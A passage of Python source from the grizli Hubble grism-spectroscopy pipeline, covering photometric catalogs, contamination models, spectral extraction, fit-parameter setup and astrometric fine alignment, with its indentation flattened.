#segment_img = pyfits.open('{0}-ir_seg.fits'.format(field_root))[0].data
fq = '{0}-{1}_dr?_sci.fits*'
for ii, filt in enumerate(filters):
print(filt)
if filt.startswith('g'):
continue
if filt not in ['g102', 'g141', 'g800l']:
sci_files = glob.glob(fq.format(field_root.replace('-100mas','-*mas'),
filt))
if len(sci_files) == 0:
continue
root = sci_files[0].split('{0}_dr'.format(filt))[0]+filt
# root = '{0}-{1}'.format(field_root, filt)
# Check for half-pixel optical images if using segmask
if aper_segmask:
sci = pyfits.open(sci_files[0])
sci_shape = sci[0].data.shape
sci.close()
del(sci)
if sci_shape[0] != aseg.shape[0]:
print('# filt={0}, need half-size segmentation image!'.format(filt), sci_shape, aseg.shape)
if aseg_half is None:
aseg_half = np.zeros(sci_shape, dtype=aseg.dtype)
for i in [0, 1]:
for j in [0, 1]:
aseg_half[i::2, j::2] += aseg
source_xy = tab['X_WORLD'], tab['Y_WORLD'], aseg_half, aseg_id
else:
source_xy = tab['X_WORLD'], tab['Y_WORLD'], aseg, aseg_id
filter_tab = prep.make_SEP_catalog(root=root,
threshold=threshold,
rescale_weight=rescale_weight,
err_scale=phot_err_scale,
get_background=photometry_background,
save_to_fits=False, source_xy=source_xy,
phot_apertures=phot_apertures, bkg_mask=bkg_mask,
bkg_params=bkg_params, use_bkg_err=use_bkg_err)
for k in filter_tab.meta:
newk = '{0}_{1}'.format(filt.upper(), k)
tab.meta[newk] = filter_tab.meta[k]
for c in filter_tab.colnames:
newc = '{0}_{1}'.format(filt.upper(), c)
tab[newc] = filter_tab[c]
# Kron total correction from EE
filt_plam = tab.meta['{0}_PLAM'.format(filt.upper())]
tot_corr = prep.get_kron_tot_corr(tab, filt.lower(),
pixel_scale=cat_pixel_scale,
photplam=filt_plam)
#ee_corr = prep.get_kron_tot_corr(tab, filter=filt.lower())
tab['{0}_tot_corr'.format(filt.upper())] = tot_corr
else:
continue
for c in tab.colnames:
tab.rename_column(c, c.lower())
idcol = utils.GTable.Column(data=tab['number'], name='id')
tab.add_column(idcol, index=0)
tab.write('{0}_phot.fits'.format(output_root), format='fits', overwrite=True)
return tab
def count_grism_exposures(phot, groups, grisms=['g800l', 'g102', 'g141'], reset=True, verbose=False):
"""
Count number of grism exposures that contain objects in a catalog
"""
from matplotlib.path import Path
points = np.array([phot['ra'], phot['dec']]).T
for g in grisms:
if ('nexp_'+g not in phot.colnames) | reset:
phot['nexp_'+g] = np.zeros(len(phot), dtype=np.int32)
for ig, g in enumerate(groups):
gri = g['grism']['product'].split('-')[-1]
if gri not in grisms:
continue
if verbose:
print('{0:<4} {1:48} {2}'.format(ig, g['grism']['product'], gri))
for fp in g['grism']['footprints']:
hull = Path(np.array(fp.convex_hull.boundary.xy).T)
phot['nexp_'+gri] += hull.contains_points(points)*1
phot['has_grism'] = (phot['nexp_'+grisms[0]] > 0).astype(np.uint8)
if len(grisms) > 1:
for ig, g in enumerate(grisms):
phot['has_grism'] |= (phot['nexp_'+g] > 0).astype(np.uint8)*2**ig
phot.meta[g+'bit'] = 2**ig
return phot
def photutils_catalog(field_root='j142724+334246', threshold=1.8, subtract_bkg=True):
"""
Make a detection catalog with SExtractor and then measure
photometry with `~photutils`.
"""
from photutils import segmentation, background
import photutils.utils
import warnings
warnings.warn('photutils_catalog is deprecated, use ``sep`` catalog '
'in multiband_catalog')
try:
from .. import prep, utils
except:
from grizli import prep, utils
# Photutils catalog
#overlaps = np.load('{0}_overlaps.npy'.format(field_root))[0]
# Make catalog
sexcat = prep.make_drz_catalog(root='{0}-ir'.format(field_root), threshold=threshold, extra_config=prep.SEXTRACTOR_CONFIG_3DHST)
#sexcat = prep.make_SEP_catalog(root='{0}-ir'.format(field_root), threshold=threshold, extra_config=prep.SEXTRACTOR_CONFIG_3DHST)
for c in sexcat.colnames:
sexcat.rename_column(c, c.lower())
sexcat = sexcat['number', 'mag_auto', 'flux_radius']
files = glob.glob('../RAW/*fl[tc].fits')
info = utils.get_flt_info(files)
if ONLY_F814W:
info = info[((info['INSTRUME'] == 'WFC3') & (info['DETECTOR'] == 'IR')) | (info['FILTER'] == 'F814W')]
filters = [f.lower() for f in np.unique(info['FILTER'])]
filters.insert(0, 'ir')
segment_img = pyfits.open('{0}-ir_seg.fits'.format(field_root))[0].data
for ii, filt in enumerate(filters):
print(filt)
if filt.startswith('g'):
continue
if filt not in ['g102', 'g141']:
sci_files = glob.glob(('{0}-{1}_dr?_sci.fits'.format(field_root, filt)))
if len(sci_files) == 0:
continue
else:
sci_file = sci_files[0]
sci = pyfits.open(sci_file)
wht = pyfits.open(sci_file.replace('_sci', '_wht'))
else:
continue
photflam = sci[0].header['PHOTFLAM']
ABZP = (-2.5*np.log10(sci[0].header['PHOTFLAM']) - 21.10 -
5*np.log10(sci[0].header['PHOTPLAM']) + 18.6921)
bkg_err = 1/np.sqrt(wht[0].data)
bkg_err[~np.isfinite(bkg_err)] = 0 # 1e30
total_error = photutils.utils.calc_total_error(sci[0].data, bkg_err, sci[0].header['EXPTIME'])
wht_mask = (wht[0].data == 0) | (sci[0].data == 0)
sci[0].data[wht[0].data == 0] = 0
mask = None # bkg_err > 1.e29
ok = wht[0].data > 0
if ok.sum() == 0:
print(' No valid pixels')
continue
if subtract_bkg:
try:
bkg = background.Background2D(sci[0].data, 100, mask=wht_mask | (segment_img > 0), filter_size=(3, 3), filter_threshold=None, edge_method='pad')
bkg_obj = bkg.background
except:
bkg_obj = None
utils.log_exception(utils.LOGFILE, traceback)
utils.log_comment(utils.LOGFILE, "# !! Couldn't make bkg_obj")
else:
bkg_obj = None
cat = segmentation.source_properties(sci[0].data, segment_img, error=total_error, mask=mask, background=bkg_obj, filter_kernel=None, wcs=pywcs.WCS(sci[0].header), labels=None)
if filt == 'ir':
cols = ['id', 'xcentroid', 'ycentroid', 'sky_centroid', 'sky_centroid_icrs', 'source_sum', 'source_sum_err', 'xmin', 'xmax', 'ymin', 'ymax', 'min_value', 'max_value', 'minval_xpos', 'minval_ypos', 'maxval_xpos', 'maxval_ypos', 'area', 'equivalent_radius', 'perimeter', 'semimajor_axis_sigma', 'semiminor_axis_sigma', 'eccentricity', 'orientation', 'ellipticity', 'elongation', 'covar_sigx2', 'covar_sigxy', 'covar_sigy2', 'cxx', 'cxy', 'cyy']
tab = utils.GTable(cat.to_table(columns=cols))
cols = ['source_sum', 'source_sum_err']
for c in cols:
tab[c.replace('sum', 'flam')] = tab[c]*photflam
else:
cols = ['source_sum', 'source_sum_err']
t_i = cat.to_table(columns=cols)
mask = (np.isfinite(t_i['source_sum_err']))
for c in cols:
tab['{0}_{1}'.format(filt, c)] = t_i[c]
tab['{0}_{1}'.format(filt, c)][~mask] = np.nan
cflam = c.replace('sum', 'flam')
tab['{0}_{1}'.format(filt, cflam)] = t_i[c]*photflam
tab['{0}_{1}'.format(filt, cflam)][~mask] = np.nan
tab.meta['PW{0}'.format(filt.upper())] = sci[0].header['PHOTPLAM']
tab.meta['ZP{0}'.format(filt.upper())] = ABZP
tab.meta['FL{0}'.format(filt.upper())] = sci[0].header['PHOTFLAM']
icrs = [(coo.ra.value, coo.dec.value) for coo in tab['sky_centroid_icrs']]
tab['ra'] = [coo[0] for coo in icrs]
tab['dec'] = [coo[1] for coo in icrs]
tab.remove_column('sky_centroid_icrs')
tab.remove_column('sky_centroid')
tab.write('{0}_phot.fits'.format(field_root), format='fits', overwrite=True)
return tab
def load_GroupFLT(field_root='j142724+334246', PREP_PATH='../Prep', force_ref=None, force_seg=None, force_cat=None, galfit=False, pad=256, files=None, gris_ref_filters=GRIS_REF_FILTERS, split_by_grism=False):
"""
Initialize a GroupFLT object
"""
import glob
import os
import numpy as np
from .. import prep, utils, multifit
if files is None:
files = glob.glob(os.path.join(PREP_PATH, '*fl[tc].fits'))
files.sort()
info = utils.get_flt_info(files)
g141 = info['FILTER'] == 'G141'
g102 = info['FILTER'] == 'G102'
g800l = info['FILTER'] == 'G800L'
if force_cat is None:
#catalog = '{0}-ir.cat.fits'.format(field_root)
catalog = glob.glob('{0}-ir.cat.fits'.format(field_root))[0]
else:
catalog = force_cat
grp_objects = []
#grp = None
if (g141.sum() > 0) & ('G141' in gris_ref_filters):
for f in gris_ref_filters['G141']:
if os.path.exists(f'{field_root}-{f.lower()}_drz_sci.fits'):
g141_ref = f
break
# Segmentation image
if force_seg is None:
if galfit == 'clean':
seg_file = '{0}-{1}_galfit_orig_seg.fits'.format(field_root, g141_ref.lower())
elif galfit == 'model':
seg_file = '{0}-{1}_galfit_seg.fits'.format(field_root, g141_ref.lower())
else:
seg_file = glob.glob('{0}-*_seg.fits'.format(field_root))[0]
#seg_file = '{0}-ir_seg.fits'.format(field_root)
else:
seg_file = force_seg
# Reference image
if force_ref is None:
if galfit == 'clean':
ref_file = '{0}-{1}_galfit_clean.fits'.format(field_root, g141_ref.lower())
elif galfit == 'model':
ref_file = '{0}-{1}_galfit.fits'.format(field_root, g141_ref.lower())
else:
ref_file = '{0}-{1}_drz_sci.fits'.format(field_root, g141_ref.lower())
else:
ref_file = force_ref
grp = multifit.GroupFLT(grism_files=list(info['FILE'][g141]), direct_files=[], ref_file=ref_file, seg_file=seg_file, catalog=catalog, cpu_count=-1, sci_extn=1, pad=pad)
grp_objects.append(grp)
if (g102.sum() > 0) & ('G102' in gris_ref_filters):
for f in gris_ref_filters['G102']:
if os.path.exists('{0}-{1}_drz_sci.fits'.format(field_root, f.lower())):
g102_ref = f
break
# Segmentation image
if force_seg is None:
if galfit == 'clean':
seg_file = '{0}-{1}_galfit_orig_seg.fits'.format(field_root, g102_ref.lower())
elif galfit == 'model':
seg_file = '{0}-{1}_galfit_seg.fits'.format(field_root, g102_ref.lower())
else:
seg_file = glob.glob('{0}-*_seg.fits'.format(field_root))[0]
else:
seg_file = force_seg
# Reference image
if force_ref is None:
if galfit == 'clean':
ref_file = '{0}-{1}_galfit_clean.fits'.format(field_root, g102_ref.lower())
elif galfit == 'model':
ref_file = '{0}-{1}_galfit.fits'.format(field_root, g102_ref.lower())
else:
ref_file = '{0}-{1}_drz_sci.fits'.format(field_root, g102_ref.lower())
else:
ref_file = force_ref
grp_i = multifit.GroupFLT(grism_files=list(info['FILE'][g102]), direct_files=[], ref_file=ref_file, seg_file=seg_file, catalog=catalog, cpu_count=-1, sci_extn=1, pad=pad)
# if g141.sum() > 0:
# grp.extend(grp_i)
# else:
# grp = grp_i
grp_objects.append(grp_i)
# del(grp_i)
# ACS
if (g800l.sum() > 0) & ('G800L' in gris_ref_filters):
acs_grp = None
for f in gris_ref_filters['G800L']:
if os.path.exists('{0}-{1}_drc_sci.fits'.format(field_root, f.lower())):
g800l_ref = f
break
# Segmentation image
if force_seg is None:
if galfit == 'clean':
seg_file = '{0}-{1}_galfit_orig_seg.fits'.format(field_root, g800l_ref.lower())
elif galfit == 'model':
seg_file = '{0}-{1}_galfit_seg.fits'.format(field_root, g800l_ref.lower())
else:
#seg_file = '{0}-ir_seg.fits'.format(field_root)
seg_file = glob.glob('{0}-*_seg.fits'.format(field_root))[0]
else:
seg_file = force_seg
# Reference image
if force_ref is None:
if galfit == 'clean':
ref_file = '{0}-{1}_galfit_clean.fits'.format(field_root, g800l_ref.lower())
elif galfit == 'model':
ref_file = '{0}-{1}_galfit.fits'.format(field_root, g800l_ref.lower())
else:
ref_file = '{0}-{1}_drc_sci.fits'.format(field_root, g800l_ref.lower())
else:
ref_file = force_ref
for sci_extn in [1, 2]:
grp_i = multifit.GroupFLT(grism_files=list(info['FILE'][g800l]), direct_files=[], ref_file=ref_file, seg_file=seg_file, catalog=catalog, cpu_count=-1, sci_extn=sci_extn, pad=0, shrink_segimage=False)
if acs_grp is not None:
acs_grp.extend(grp_i)
del(grp_i)
else:
acs_grp = grp_i
if acs_grp is not None:
grp_objects.append(acs_grp)
if split_by_grism:
return grp_objects
else:
grp = grp_objects[0]
if len(grp_objects) > 0:
for i in range(1, len(grp_objects)):
grp.extend(grp_objects[i])
del(grp_objects[i])
return [grp]
def grism_prep(field_root='j142724+334246', PREP_PATH='../Prep', EXTRACT_PATH='../Extractions', ds9=None, refine_niter=3, gris_ref_filters=GRIS_REF_FILTERS, files=None, split_by_grism=True, refine_poly_order=1, refine_fcontam=0.5, cpu_count=0, mask_mosaic_edges=True, prelim_mag_limit=25, refine_mag_limits=[18, 24], grisms_to_process=None):
"""
Contamination model for grism exposures
"""
import glob
import os
import numpy as np
import scipy.stats
try:
from .. import prep, utils, multifit
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.grism_prep')
except:
from grizli import prep, utils, multifit
if grisms_to_process is not None:
for g in gris_ref_filters.copy():
if g not in grisms_to_process:
pg = gris_ref_filters.pop(g)
grp_objects = load_GroupFLT(field_root=field_root, PREP_PATH=PREP_PATH,
gris_ref_filters=gris_ref_filters,
files=files, split_by_grism=split_by_grism)
for grp in grp_objects:
################
# Compute preliminary model
grp.compute_full_model(fit_info=None, verbose=True, store=False,
mag_limit=prelim_mag_limit, coeffs=[1.1, -0.5],
cpu_count=cpu_count)
##############
# Save model to avoid having to recompute it again
grp.save_full_data()
#############
# Mask edges of the exposures not covered by reference image
if mask_mosaic_edges:
try:
# Read footprint file created ealier
fp_file = '{0}-ir.npy'.format(field_root)
det_poly = np.load(fp_file, allow_pickle=True)[0]['footprint']
for flt in grp.FLTs:
flt.mask_mosaic_edges(sky_poly=det_poly, verbose=True,
dq_mask=False, dq_value=1024,
err_scale=10, resid_sn=-1)
except:
pass
################
# Remove constant modal background
for i in range(grp.N):
mask = (grp.FLTs[i].model < grp.FLTs[i].grism['ERR']*0.6)
mask &= (grp.FLTs[i].grism['SCI'] != 0)
# Fit Gaussian to the masked pixel distribution
clip = np.ones(mask.sum(), dtype=bool)
for iter in range(3):
clip_data = grp.FLTs[i].grism.data['SCI'][mask][clip]
n = scipy.stats.norm.fit(clip_data)
clip = np.abs(grp.FLTs[i].grism.data['SCI'][mask]) < 3*n[1]
del(clip_data)
mode = n[0]
logstr = '# grism_mode_bg {0} {1} {2:.4f}'
logstr = logstr.format(grp.FLTs[i].grism.parent_file,
grp.FLTs[i].grism.filter, mode)
utils.log_comment(utils.LOGFILE, logstr, verbose=True)
try:
ds9.view(grp.FLTs[i].grism['SCI'] - grp.FLTs[i].model)
except:
pass
# Subtract
grp.FLTs[i].grism.data['SCI'] -= mode
#############
# Refine the model
i = 0
if ds9:
ds9.view(grp.FLTs[i].grism['SCI'] - grp.FLTs[i].model)
fr = ds9.get('frame')
utils.log_comment(utils.LOGFILE, '# Refine contamination',
verbose=True, show_date=True)
for iter in range(refine_niter):
print('\nRefine contamination model, iter # {0}\n'.format(iter))
if ds9:
ds9.set('frame {0}'.format(int(fr)+iter+1))
if (iter == 0) & (refine_niter > 0):
refine_i = 1
else:
refine_i = refine_fcontam
grp.refine_list(poly_order=refine_poly_order,
mag_limits=refine_mag_limits,
max_coeff=5, ds9=ds9, verbose=True,
fcontam=refine_i)
##############
# Save model to avoid having to recompute it again
grp.save_full_data()
# Link minimal files to Extractions directory
os.chdir(EXTRACT_PATH)
os.system(f'ln -s {PREP_PATH}/*GrismFLT* .')
os.system(f'ln -s {PREP_PATH}/*_fl*wcs.fits .')
os.system(f'ln -s {PREP_PATH}/{field_root}-*.cat.fits .')
os.system(f'ln -s {PREP_PATH}/{field_root}-*seg.fits .')
os.system(f'ln -s {PREP_PATH}/*_phot.fits .')
return grp
DITHERED_PLINE = {'kernel': 'point', 'pixfrac': 0.2, 'pixscale': 0.1, 'size': 8, 'wcs': None}
PARALLEL_PLINE = {'kernel': 'square', 'pixfrac': 1.0, 'pixscale': 0.1, 'size': 8, 'wcs': None}
def refine_model_with_fits(field_root='j142724+334246', grp=None, master_files=None, spectrum='continuum', clean=True, max_chinu=5):
"""
Refine the full-field grism models with the best fit spectra from
individual extractions.
"""
import glob
import traceback
try:
from .. import multifit
except:
from grizli import multifit
if grp is None:
if master_files is None:
master_files = glob.glob('*GrismFLT.fits')
master_files.sort()
catalog = glob.glob(f'{field_root}-*.cat.fits')[0]
try:
seg_file = glob.glob(f'{field_root}-*_seg.fits')[0]
except:
seg_file = None
grp = multifit.GroupFLT(grism_files=master_files, direct_files=[], ref_file=None, seg_file=seg_file, catalog=catalog, cpu_count=-1, sci_extn=1, pad=256)
fit_files = glob.glob('*full.fits')
fit_files.sort()
N = len(fit_files)
if N == 0:
return False
msg = 'Refine model ({0}/{1}): {2} / skip (chinu={3:.1f}, dof={4})'
for i, file in enumerate(fit_files):
try:
hdu = pyfits.open(file)
id = hdu[0].header['ID']
fith = hdu['ZFIT_STACK'].header
chinu = fith['CHIMIN']/fith['DOF']
if (chinu > max_chinu) | (fith['DOF'] < 10):
print(msg.format(i, N, file, chinu, fith['DOF']))
continue
sp = utils.GTable(hdu['TEMPL'].data)
dt = np.float
wave = np.cast[dt](sp['wave']) # .byteswap()
flux = np.cast[dt](sp[spectrum]) # .byteswap()
grp.compute_single_model(int(id), mag=19, size=-1, store=False,
spectrum_1d=[wave, flux], is_cgs=True,
get_beams=None, in_place=True)
print('Refine model ({0}/{1}): {2}'.format(i, N, file))
except:
print('Refine model ({0}/{1}): {2} / failed'.format(i, N, file))
grp.save_full_data()
if clean:
print('# refine_model_with_fits: cleanup')
files = glob.glob('*_grism_*fits')
files += glob.glob('*beams.fits')
files += glob.glob('*stack.fits')
files += glob.glob('*stack.png')
files += glob.glob('*full.fits')
for file in files:
os.remove(file)
del(grp)
def extract(field_root='j142724+334246', maglim=[13, 24], prior=None, MW_EBV=0.00, ids=[], pline=DITHERED_PLINE, fit_only_beams=True, run_fit=True, poly_order=7, oned_R=30, master_files=None, grp=None, bad_pa_threshold=None, fit_trace_shift=False, size=32, diff=True, min_sens=0.02, fcontam=0.2, min_mask=0.01, sys_err=0.03, skip_complete=True, fit_args={}, args_file='fit_args.npy', get_only_beams=False):
import glob
import os
import numpy as np
import matplotlib.pyplot as plt
#import grizli
try:
from .. import multifit, prep, utils, fitting
except:
from grizli import multifit, prep, utils, fitting
if master_files is None:
master_files = glob.glob('*GrismFLT.fits')
master_files.sort()
if grp is None:
init_grp = True
catalog = glob.glob('{0}-*.cat.fits'.format(field_root))[0]
try:
seg_file = glob.glob('{0}-*_seg.fits'.format(field_root))[0]
except:
seg_file = None
grp = multifit.GroupFLT(grism_files=master_files, direct_files=[], ref_file=None, seg_file=seg_file, catalog=catalog, cpu_count=-1, sci_extn=1, pad=256)
else:
init_grp = False
###############
# PHotometry
target = field_root
try:
file_args = np.load(args_file, allow_pickle=True)[0]
MW_EBV = file_args['MW_EBV']
min_sens = file_args['min_sens']
min_mask = file_args['min_mask']
fcontam = file_args['fcontam']
sys_err = file_args['sys_err']
pline = file_args['pline']
fit_args = file_args
fit_args.pop('kwargs')
except:
pass
if get_only_beams:
beams = grp.get_beams(ids, size=size, beam_id='A', min_sens=min_sens)
if init_grp:
del(grp)
return(beams)
###########
# IDs to extract
# ids=[1096]
if ids == []:
clip = (grp.catalog['MAG_AUTO'] > maglim[0]) & (grp.catalog['MAG_AUTO'] < maglim[1])
so = np.argsort(grp.catalog['MAG_AUTO'][clip])
ids = grp.catalog['NUMBER'][clip][so]
else:
ids = [int(id) for id in ids]
# Stack the different beans
# Use "binning" templates for standardized extraction
if oned_R:
bin_steps, step_templ = utils.step_templates(wlim=[5000, 18000.0],
R=oned_R, round=10)
init_templates = step_templ
else:
# Polynomial templates
wave = np.linspace(2000, 2.5e4, 100)
poly_templ = utils.polynomial_templates(wave, order=poly_order)
init_templates = poly_templ
#size = 32
close = True
show_beams = True
if __name__ == '__main__': # Interactive
size = 32
close = Skip = False
pline = {'kernel': 'point', 'pixfrac': 0.2, 'pixscale': 0.1, 'size': 8, 'wcs': None}
prior = None
skip_complete = True
fit_trace_shift = False
bad_pa_threshold = 1.6
MW_EBV = 0
###############
# Stacked spectra
for ii, id in enumerate(ids):
if skip_complete:
if os.path.exists('{0}_{1:05d}.stack.png'.format(target, id)):
continue
beams = grp.get_beams(id, size=size, beam_id='A', min_sens=min_sens)
for i in range(len(beams))[::-1]:
if beams[i].fit_mask.sum() < 10:
beams.pop(i)
print('{0}/{1}: {2} {3}'.format(ii, len(ids), id, len(beams)))
if len(beams) < 1:
continue
#mb = multifit.MultiBeam(beams, fcontam=fcontam, group_name=target, psf=False, MW_EBV=MW_EBV, min_sens=min_sens)
mb = multifit.MultiBeam(beams, fcontam=fcontam, group_name=target, psf=False, MW_EBV=MW_EBV, sys_err=sys_err, min_mask=min_mask, min_sens=min_sens)
if bad_pa_threshold is not None:
out = mb.check_for_bad_PAs(chi2_threshold=bad_pa_threshold,
poly_order=1, reinit=True,
fit_background=True)
fit_log, keep_dict, has_bad = out
if has_bad:
print('\n Has bad PA! Final list: {0}\n{1}'.format(keep_dict, fit_log))
ixi = grp.catalog['NUMBER'] == id
if (fit_trace_shift > 0) & (grp.catalog['MAG_AUTO'][ixi][0] < 24.5):
b = mb.beams[0]
b.compute_model()
sn_lim = fit_trace_shift*1
if (np.max((b.model/b.grism['ERR'])[b.fit_mask.reshape(b.sh)]) > sn_lim) | (sn_lim > 100):
print(' Fit trace shift: \n')
try:
shift = mb.fit_trace_shift(tol=1.e-3, verbose=True, split_groups=True, lm=True)
except:
pass
try:
tfit = mb.template_at_z(z=0, templates=init_templates, fit_background=True, fitter='lstsq', get_uncertainties=2)
except:
tfit = None
try:
fig1 = mb.oned_figure(figsize=[5, 3], tfit=tfit, show_beams=show_beams, scale_on_stacked=True, ylim_percentile=5)
if oned_R:
outroot = '{0}_{1:05d}.R{2:.0f}'.format(target, id, oned_R)
hdu = mb.oned_spectrum_to_hdu(outputfile=outroot+'.fits',
tfit=tfit, wave=bin_steps)
else:
outroot = '{0}_{1:05d}.1D'.format(target, id)
hdu = mb.oned_spectrum_to_hdu(outputfile=outroot+'.fits',
tfit=tfit)
fig1.savefig(outroot+'.png')
except:
continue
hdu, fig = mb.drizzle_grisms_and_PAs(fcontam=0.5, flambda=False, kernel='point', size=32, tfit=tfit, diff=diff)
fig.savefig('{0}_{1:05d}.stack.png'.format(target, id))
hdu.writeto('{0}_{1:05d}.stack.fits'.format(target, id),
overwrite=True)
mb.write_master_fits()
if False:
# Fit here for AWS...
fitting.run_all_parallel(id, verbose=True)
if close:
plt.close(fig)
plt.close(fig1)
del(hdu)
del(mb)
for k in range(100000):
plt.close()
if not run_fit:
if init_grp:
return grp
else:
return True
for ii, id in enumerate(ids):
print('{0}/{1}: {2}'.format(ii, len(ids), id))
if not os.path.exists('{0}_{1:05d}.beams.fits'.format(target, id)):
continue
if skip_complete:
if os.path.exists('{0}_{1:05d}.line.png'.format(target, id)):
continue
try:
out = fitting.run_all_parallel(id, get_output_data=True, **fit_args, args_file=args_file)
mb, st, fit, tfit, line_hdu = out
spectrum_1d = [tfit['cont1d'].wave, tfit['cont1d'].flux]
grp.compute_single_model(id, mag=-99, size=-1, store=False, spectrum_1d=spectrum_1d, get_beams=None, in_place=True, is_cgs=True)
if close:
for k in range(1000):
plt.close()
del(out)
except:
pass
# Re-save data with updated models
if init_grp:
grp.save_full_data()
return grp
else:
return True
def generate_fit_params(field_root='j142724+334246', fitter=['nnls', 'bounded'], prior=None, MW_EBV=0.00, pline=DITHERED_PLINE, fit_only_beams=True, run_fit=True, poly_order=7, fsps=True, min_sens=0.01, sys_err=0.03, fcontam=0.2, zr=[0.05, 3.6], dz=[0.004, 0.0004], fwhm=1000, lorentz=False, include_photometry=True, use_phot_obj=False, save_file='fit_args.npy', fit_trace_shift=False, **kwargs):
"""
Generate a parameter dictionary for passing to the fitting script
"""
import numpy as np
from grizli import utils, fitting
from . import photoz
phot = None
t0 = utils.load_templates(fwhm=fwhm, line_complexes=True, stars=False, full_line_list=None, continuum_list=None, fsps_templates=fsps, alf_template=True, lorentz=lorentz)
t1 = utils.load_templates(fwhm=fwhm, line_complexes=False, stars=False, full_line_list=None, continuum_list=None, fsps_templates=fsps, alf_template=True, lorentz=lorentz)
args = fitting.run_all(0, t0=t0, t1=t1, fwhm=1200, zr=zr, dz=dz, fitter=fitter, group_name=field_root, fit_stacks=False, prior=prior, fcontam=fcontam, pline=pline, min_sens=min_sens, mask_sn_limit=np.inf, fit_beams=False, root=field_root, fit_trace_shift=fit_trace_shift, phot=phot, use_phot_obj=use_phot_obj, verbose=True, scale_photometry=False, show_beams=True, overlap_threshold=10, get_ir_psfs=True, fit_only_beams=fit_only_beams, MW_EBV=MW_EBV, sys_err=sys_err, get_dict=True)
# EAZY-py photometry object from HST photometry
try:
import eazy.photoz
HAS_EAZY = True
except:
HAS_EAZY = False
if include_photometry & HAS_EAZY:
aper_ix = include_photometry*1
utils.set_warnings()
total_flux = 'flux_auto'
obj = photoz.eazy_photoz(field_root, object_only=True,
apply_prior=False, beta_prior=True, aper_ix=aper_ix-1,
force=True,
get_external_photometry=False, compute_residuals=False,
total_flux=total_flux)
cat = obj.cat
#apcorr = cat['flux_iso']/(cat['flux_auto']*cat['tot_corr'])
apcorr = None
phot_obj = photoz.EazyPhot(obj, grizli_templates=t0,
source_text='grizli_HST_photometry',
apcorr=apcorr,
include_photometry=True, include_pz=False)
args['phot_obj'] = phot_obj
args['scale_photometry'] = True
np.save(save_file, [args])
print('Saved arguments to {0}.'.format(save_file))
return args
def summary_catalog(**kwargs):
from . import summary
res = summary.summary_catalog(**kwargs)
return res
def fine_alignment(field_root='j142724+334246', HOME_PATH='/Volumes/Pegasus/Grizli/Automatic/', min_overlap=0.2, stopme=False, ref_err=1.e-3, radec=None, redrizzle=True, shift_only=True, maglim=[17, 24], NITER=1, catalogs=['GAIA', 'PS1', 'NSC', 'SDSS', 'WISE'], method='Powell', radius=5., program_str=None, match_str=[], all_visits=None, date=None, gaia_by_date=False, tol=None, fit_options=None, print_options={'precision': 3, 'sign': ' '}, include_internal_matches=True, master_gaia_catalog=None):
"""
Try fine alignment from visit-based SExtractor catalogs
Parameters
----------
Returns
-------
"""
import os
import glob
import time
try:
from .. import prep, utils
from ..prep import get_radec_catalog, get_gaia_radec_at_time
from ..utils import transform_wcs
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.fine_alignment')
except:
from grizli import prep, utils
from grizli.prep import get_radec_catalog
from grizli.utils import transform_wcs
import numpy as np
np.set_printoptions(**print_options)
import matplotlib.pyplot as plt
from shapely.geometry import Polygon
from scipy.spatial import ConvexHull
from drizzlepac import updatehdr
import astropy.units as u
from scipy.optimize import minimize, fmin_powell
import copy
if all_visits is None:
_ = np.load(f'{field_root}_visits.npy', allow_pickle=True)
all_visits, all_groups, info = _
failed_list = glob.glob('*failed')
visits = []
files = []
for visit in all_visits:
file = '{0}.cat.fits'.format(visit['product'])
if visit['product']+'.failed' in failed_list:
continue
if os.path.exists(file):
if program_str is not None:
prog = visit['product'].split('-')[-4]
if prog != program_str:
continue
if len(match_str) > 0:
has_match = False
for m in match_str:
has_match |= m in visit['product']
if not has_match:
continue
visits.append(visit)
files.append(file)
if radec is None:
ra_i, dec_i = np.median(info['RA_TARG']), np.median(info['DEC_TARG'])
print('Center coordinate: ', ra_i, dec_i)
if date is not None:
radec, ref_catalog = get_radec_catalog(ra=ra_i, dec=dec_i,
product=field_root, date=date,
reference_catalogs=catalogs, radius=radius)
else:
radec, ref_catalog = get_radec_catalog(ra=ra_i, dec=dec_i,
product=field_root,
reference_catalogs=catalogs, radius=radius)
#ref = 'j152643+164738_sdss.radec'
ref_tab = utils.GTable(np.loadtxt(radec, unpack=True).T,
names=['ra', 'dec'])
ridx = np.arange(len(ref_tab))
# Global GAIA DR2 catalog
if gaia_by_date:
if master_gaia_catalog is not None:
msg = (f'Master gaia catalog: {master_gaia_catalog}')
utils.log_comment(utils.LOGFILE, msg, show_date=True,
verbose=True)
gaia_tab = utils.read_catalog(master_gaia_catalog)
else:
dra = np.max(np.abs(info['RA_TARG']-ra_i))
dde = np.max(np.abs(info['DEC_TARG']-dec_i))
drad = np.sqrt((dra*np.cos(dec_i/180*np.pi))**2+(dde**2))*60+2
msg = (f'Get field GAIA catalog ({ra_i:.6f}, {dec_i:.6f})' +
f' r={drad:.1f}arcmin')
utils.log_comment(utils.LOGFILE, msg, show_date=True,
verbose=True)
gaia_tab = prep.get_gaia_DR2_vizier(ra=ra_i, dec=dec_i,
radius=drad)
# Done
msg = f'GAIA catalog: {len(gaia_tab)} objects'
utils.log_comment(utils.LOGFILE, msg, show_date=True,
verbose=True)
if len(gaia_tab) == 0:
msg = f'!No GAIA objects found, will run without absolute frame'
utils.log_comment(utils.LOGFILE, msg, show_date=True,
verbose=True)
gaia_tab = None
else:
gaia_tab = None
# Find matches
tab = {}
for i, file in enumerate(files):
tab[i] = {}
t_i = utils.GTable.gread(file)
mclip = (t_i['MAG_AUTO'] > maglim[0]) & (t_i['MAG_AUTO'] < maglim[1])
if mclip.sum() == 0:
continue
tab[i]['cat'] = t_i[mclip]
try:
sci_file = glob.glob(file.replace('.cat', '_dr?_sci'))[0]
except:
sci_file = glob.glob(file.replace('.cat', '_wcs'))[0]
im = pyfits.open(sci_file)
tab[i]['wcs'] = pywcs.WCS(im[0].header)
tab[i]['transform'] = [0, 0, 0, 1]
tab[i]['xy'] = np.array([tab[i]['cat']['X_IMAGE'], tab[i]['cat']['Y_IMAGE']]).T
tab[i]['match_idx'] = {}
if gaia_by_date & (gaia_tab is not None):
drz_file = glob.glob(file.replace('.cat.fits',
'*dr?_sci.fits'))[0]
drz_im = pyfits.open(drz_file)
coo = get_gaia_radec_at_time(gaia_tab,
date=drz_im[0].header['EXPSTART'],
format='mjd')
ok = np.isfinite(coo.ra+coo.dec)
ref_tab = utils.GTable()
if ok.sum() == 0:
ref_tab['ra'] = [0.]
